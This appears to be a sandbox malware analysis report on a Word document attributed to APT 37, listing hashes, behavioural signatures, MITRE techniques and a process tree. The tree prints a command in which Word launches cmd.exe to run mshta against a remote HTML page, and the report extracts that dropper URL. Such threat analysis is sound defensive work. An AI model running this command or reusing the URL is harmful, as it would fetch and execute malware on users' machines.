Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 23:28

General

  • Target

    APT 37 Previous Commits 3/NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc

  • Size

    768KB

  • MD5

    e89725778e52fa571a229cc6e65acd8d

  • SHA1

    11e14587aa9e4c3039a214b21d63a616a32aa01b

  • SHA256

    0474bb7c100c5187c838e5cf14969fdaf04ed541e373aa3b1ad607dd2b420a1b

  • SHA512

    cf070d7c2cd2f2006b55da592f4db8758ec94d3608d91bebef3ba958ac34bbabffa7dc2f17f52a77349ea922e6efbd22fddb74b6aaadd37593be2f28c3bcbb82

  • SSDEEP

    12288:5eNs9H0fEccVGYEOH1uW7vyaQaHbB/g+1ev/6d6htoWHdttOOJVYqTz:YeRcBc1u6tHHbm/QUoW9XOO8

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://attiferstudio.com/install.bak/sony/10.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\APT 37 Previous Commits 3\NEW(주)ì— ì—스ë¶ìŠ¤ 사업ìžë“±ë¡ì¦.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mshta http://attiferstudio.com/install.bak/sony/10.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\system32\mshta.exe
        mshta http://attiferstudio.com/install.bak/sony/10.html
        3⤵
        • Blocklisted process makes network request
        PID:1484

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1560-133-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-135-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-134-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-136-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-137-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-138-0x00007FFBAEAE0000-0x00007FFBAEAF0000-memory.dmp
    Filesize

    64KB

  • memory/1560-139-0x00007FFBAEAE0000-0x00007FFBAEAF0000-memory.dmp
    Filesize

    64KB

  • memory/1560-170-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-169-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-172-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB

  • memory/1560-171-0x00007FFBB0E10000-0x00007FFBB0E20000-memory.dmp
    Filesize

    64KB